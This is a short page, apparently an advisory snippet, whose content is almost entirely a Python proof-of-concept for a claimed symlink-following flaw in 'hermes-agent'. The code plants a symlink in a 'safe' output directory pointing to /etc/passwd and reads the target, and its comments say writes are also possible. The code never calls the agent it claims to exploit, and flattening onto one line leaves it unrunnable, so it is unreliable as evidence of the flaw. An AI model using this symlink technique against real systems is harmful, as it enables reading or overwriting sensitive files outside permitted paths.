CVE-2026-7397 hermes-agent符号链接跟随漏洞

import os # PoC for CVE-2026-7397: Symlink Following in hermes-agent # The vulnerability allows a local low-privileged user to bypass # the _check_sensitive_path check via a symlink. def exploit(): # Assume the agent is configured to write logs or data to a 'safe' directory safe_dir = "/tmp/hermes_safe_output" os.makedirs(safe_dir, exist_ok=True) # Target a sensitive system file (e.g., a critical config or script) sensitive_target = "/etc/passwd" # Create a malicious symlink inside the 'safe' directory # The name looks innocent, but points outside the restricted scope malicious_link_path = os.path.join(safe_dir, "output_log.txt") try: os.symlink(sensitive_target, malicious_link_path) print(f"[+] Symlink created: {malicious_link_path} -> {sensitive_target}") # Simulate the vulnerable function call # The application checks the path 'output_log.txt' against allowed paths. # Due to the flaw, it follows the link to /etc/passwd. print(f"[*] Triggering vulnerable file operation...") with open(malicious_link_path, 'r') as f: # This demonstrates read access; write access (I:L) is also possible content = f.read() print("[!] Successfully read sensitive file content via symlink.") except Exception as e: print(f"[-] Exploit failed: {e}") finally: # Cleanup if os.path.islink(malicious_link_path): os.remove(malicious_link_path) if __name__ == "__main__": exploit()